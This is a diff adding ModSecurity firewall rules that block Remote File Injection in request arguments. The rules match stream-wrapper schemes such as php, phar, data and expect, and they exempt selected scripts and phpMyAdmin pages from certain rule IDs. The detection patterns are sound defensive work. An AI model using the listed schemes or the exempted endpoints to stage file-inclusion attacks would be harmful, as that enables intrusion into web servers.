+SecAction "phase:2,id:91303,t:none,pass,nolog,skipAfter:END_RULES_91303"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:mirror|!ARGS:ftp_server "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340720,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:mirror|!ARGS:ftp_server "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340721,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91303
+
+SecRule REQUEST_FILENAME "/pap\.swf" "phase:2,id:91304,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91305,t:none,pass,nolog,skipAfter:END_RULES_91305"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:v1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340722,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:v1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340723,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91305
+
+SecRule REQUEST_FILENAME "/fckeditor\.html" "phase:2,id:91306,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91307,t:none,pass,nolog,skipAfter:END_RULES_91307"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:CustomConfigurationsPath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,id:340724,phase:2,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:CustomConfigurationsPath "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340725,phase:2,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91307
+
+SecRule REQUEST_FILENAME "/timthumb\.php" "phase:2,id:91308,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91309,t:none,pass,nolog,skipAfter:END_RULES_91309"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:340726,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340727,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91309
+
+SecRule REQUEST_FILENAME "/phpthumb\.php" "phase:2,id:91310,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91311,t:none,pass,nolog,skipAfter:END_RULES_91311"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:375726,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:375737,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91311
+
+SecRule REQUEST_FILENAME "/phpthumb/phpthumb\.php" "phase:2,id:91312,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91313,t:none,pass,nolog,skipAfter:END_RULES_91313"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:376726,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:375727,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91313
+
+SecRule REQUEST_FILENAME "/upload\.php" "phase:2,id:91314,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+
+SecRule REQUEST_FILENAME "/idevaffiliate/admin/setup\.php" "phase:2,id:91315,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91316,t:none,pass,nolog,skipAfter:END_RULES_91316"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:full_path "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,id:340730,phase:2,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:full_path "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340731,phase:2,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91316
+
+SecRule REQUEST_FILENAME "/install/index\.php" "phase:2,id:91317,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/tbl_create\.php" "phase:2,id:91318,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/view_create\.php" "phase:2,id:91319,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/tbl_select\.php" "phase:2,id:91320,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/tbl_addfield\.php" "phase:2,id:91321,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/tbl_change\.php" "phase:2,id:91322,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/phpmyadmin/" "phase:2,id:91323,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/movieonline\.php" "phase:2,id:91324,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91325,t:none,pass,nolog,skipAfter:END_RULES_91325"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:list "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340732,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:list "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340733,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91325
+
+SecRule REQUEST_FILENAME "/listings/client\.php" "phase:2,id:91326,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91327,t:none,pass,nolog,skipAfter:END_RULES_91327"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:line3 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340734,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:line3 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340735,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91327
+
+SecRule REQUEST_FILENAME "/test_index\.php" "phase:2,id:91328,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91329,t:none,pass,nolog,skipAfter:END_RULES_91329"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:rf "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340736,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:rf "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340737,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91329
+
+SecRule REQUEST_FILENAME "/recommend\.cgi" "phase:2,id:91330,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91331,t:none,pass,nolog,skipAfter:END_RULES_91331"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:name "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340738,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:name "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340739,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91331
+
+SecRule REQUEST_FILENAME "/goodscounter\.php" "phase:2,id:91332,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340151"
+SecAction "phase:2,id:91333,t:none,pass,nolog,skipAfter:END_RULES_91333"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:u|!ARGS:cof|!ARGS:ureferrer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340740,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
